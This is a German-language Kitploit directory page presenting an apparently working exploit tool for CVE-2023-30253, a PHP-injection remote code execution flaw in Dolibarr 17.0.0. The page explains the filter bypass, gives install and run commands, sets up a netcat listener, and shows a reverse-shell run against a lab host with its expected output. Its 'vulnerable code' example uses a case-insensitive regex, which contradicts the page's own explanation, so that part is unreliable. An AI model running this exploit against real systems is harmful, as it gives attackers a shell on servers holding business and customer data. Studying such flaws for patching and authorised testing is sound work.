Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Einreichen
ToolsExploitsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

FeedsKontaktDatenschutz© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2023-30253-exploit — CVE-2023-30253 — Dolibarr ERP/CRM 17.0.0 RCE per PHP-Codeinjektion (Lehr-Exploit) | Kitploit
Tools/GitHubGitHub/jeanback1/cve-2023-30253-exploit
SchwachstellenanalyseCode-AnalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & BildungPayload-Entwicklung
GitHubjeanback1/cve-2023-30253-exploit

CVE-2023-30253-exploit

CVE-2023-30253 — Dolibarr ERP/CRM 17.0.0 RCE per PHP-Codeinjektion (Lehr-Exploit)

Repository anzeigen
8vor 4 MonatenNoch nicht geprüft
Webseite

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2023-30253 — Dolibarr ERP/CRM 17.0.0 Remote Code Execution

Python 3.8+ License CVSS

Exploit für PHP-Code-Injection für Dolibarr ERP/CRM v17.0.0, der es ermöglicht, über das Website-/CMS-Modul eine Reverse-Shell als Benutzer www-data zu erhalten.

⚠️ Nur für Bildungszwecke und autorisierte Audits.


📑 Inhaltsverzeichnis

  • Was ist CVE-2023-30253?
  • Wie funktioniert die Schwachstelle?
  • Auswirkungen
  • Was macht dieser Exploit?
  • Voraussetzungen
  • Installation
  • Verwendung
  • Praktisches Beispiel
  • Der Exploit Schritt für Schritt
  • Gegenmaßnahmen
  • Referenzen

🔍 Was ist CVE-2023-30253?

CVE-2023-30253 ist eine PHP-Code-Injection-Schwachstelle (CWE-94: Improper Control of Generation of Code) in Dolibarr ERP/CRM vor Version 17.0.1.

Sie wurde im Mai 2023 vom Team von Swascan (jetzt Hacktivesecurity) entdeckt und gemeldet. Die Schwachstelle liegt im Website-/CMS-Modul, das es authentifizierten Benutzern ermöglicht, Websites innerhalb von Dolibarr zu erstellen und zu verwalten.

FeldWert
CVECVE-2023-30253
CVSS v3.18.8 (HIGH)
VectorAV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
TypCWE-94 — Code Injection
Betroffene SoftwareDolibarr ERP/CRM < 17.0.1
BerechtigungenAuthentifizierter Benutzer (jede Rolle)
PatchDolibarr 17.0.1 — Commit 4f6055c

⚙️ Wie funktioniert die Schwachstelle?

Dolibarr implementiert einen Filter, um zu verhindern, dass Benutzer PHP-Code in den Inhalt der Seiten des Website-Moduls injizieren. Dieser Filter hat jedoch einen kritischen Fehler: Er ist case-sensitive.

// Código vulnerable (simplificado) en Dolibarr 17.0.0
if (preg_match('/<\?php/i', $content)) {
    // Bloquea solo "<?php" en minúsculas exactas... ¿o no?
    die("PHP code detected!");
}

Der Filter sucht wörtlich nach der Zeichenkette <?php in Kleinbuchstaben. PHP erlaubt jedoch jede Kombination von Groß- und Kleinbuchstaben für das Öffnungs-Tag. Das bedeutet:

TagGefiltert?Von PHP ausgeführt?
<?php ... ?>✅✅
<?PHP ... ?>❌✅
<?Php ... ?>❌✅
<?pHp ... ?>❌✅

Der Exploit verwendet <?PHP (in Großbuchstaben), um den Filter zu umgehen, aber jede Variante funktioniert.

Außerdem wird der Filter nur beim Speichern des Inhalts angewendet. Beim Ausliefern der Seite übergibt Dolibarr den Inhalt ohne weitere Bereinigung an den PHP-Interpreter, der jeglichen Code mit dem Öffnungs-Tag <? ausführt.


💥 Auswirkungen

Ein authentifizierter Angreifer kann:

  • Remotecodeausführung (RCE) auf dem Server
  • Zugriff auf die Dolibarr-Datenbank (Kunden, Rechnungen, Benutzer)
  • Sensible Systemdateien lesen (/etc/passwd, Konfiguration)
  • Den Server als Ausgangspunkt für interne Angriffe nutzen
  • Malware, Webshells oder persistente Backdoors installieren

Warum ist das kritisch? Dolibarr wird als Unternehmens-ERP/CRM eingesetzt. Ein Eindringen kann Kundendaten, Finanzen, Verträge und interne Anmeldedaten offenlegen.


🛠️ Was macht dieser Exploit?

Der Exploit automatisiert den gesamten Exploit-Prozess in 5 Schritten:

┌─────────────────────────────────────────────────────────┐
│                   CVE-2023-30253                       │
│                                                         │
│  1. Login          → Autenticarse en Dolibarr           │
│  2. Create Website → Crear un sitio web vacío           │
│  3. Create Page    → Crear una página en el sitio       │
│  4. Inject Shell   → Inyectar PHP reverse shell         │
│  5. Trigger        → Ejecutar el payload                │
│                                                         │
│  Resultado: 🎯 Shell reversa como www-data              │
└─────────────────────────────────────────────────────────┘

Eigenschaften:

  • ✅ Automatische Handhabung von Anti-CSRF-Tokens
  • ✅ Persistente Sitzung mit Cookies
  • ✅ Automatische Erkennung der pageid
  • ✅ Verbose-Modus zur Fehlersuche
  • ✅ Farbige Ausgabe (abschaltbar)
  • ✅ Reverse-Shell-Payload über fsockopen + proc_open

📋 Voraussetzungen

  • Python 3.8+
  • requests
  • beautifulsoup4

Oder einfach:

pip install -r requirements.txt

📦 Installation

# Clonar el repositorio
git clone https://github.com/jeanback1/CVE-2023-30253-exploit.git
cd CVE-2023-30253-exploit

# Instalar dependencias
pip install -r requirements.txt

🚀 Verwendung

python exploit.py <target> <username> <password> <lhost> <lport> [opciones]

Positionsargumente:

ArgumentBeschreibungBeispiel
targetBasis-URL von Dolibarrhttp://crm.board.htb
usernameDolibarr-Benutzeradmin
passwordDolibarr-Passwortadmin
lhostDeine IP (wo du die Shell empfängst)10.10.14.5
lportDein Port (wo du die Shell empfängst)4444

Optionen:

OptionBeschreibung
-v, --verboseZeigt detaillierte Debug-Informationen
--no-colorDeaktiviert Farben in der Ausgabe
-h, --helpZeigt Hilfe und Beispiele an

🎯 Praktisches Beispiel

Terminal 1 — Reverse-Shell-Listener starten

nc -lvnp 4444

Terminal 2 — Exploit ausführen

python exploit.py http://crm.board.htb admin admin 10.10.14.5 4444 --verbose

Erwartete Ausgabe

════════════════════════════════════════════════════════
 CVE-2023-30253 — Dolibarr 17.0.0 RCE Exploit
════════════════════════════════════════════════════════

  Target:   http://crm.board.htb
  User:     admin
  LHOST:    10.10.14.5
  LPORT:    4444
  Site ID:  s3a1f2bc

──────────────────────────────────────────────────

[10:45:12] Paso 1/5: Iniciando sesión...
[10:45:12]   ✓ Sesión iniciada correctamente

[10:45:13] Paso 2/5: Creando sitio web...
[10:45:13]   ✓ Sitio web 's3a1f2bc' creado

[10:45:13] Paso 3/5: Creando página en el sitio...
[10:45:13]   ✓ Página creada dentro del sitio

[10:45:14] Paso 4/5: Inyectando reverse shell → 10.10.14.5:4444...
[10:45:14]   ✓ Código PHP inyectado exitosamente

[10:45:14] Paso 5/5: Ejecutando payload (trigger)...

════════════════════════════════════════════════════════
  EXPLOTACIÓN COMPLETADA
════════════════════════════════════════════════════════

  Trigger URL:
  http://crm.board.htb/public/website/index.php?website=s3a1f2bc&pageref=s3a1f2bc
Tool herunterladen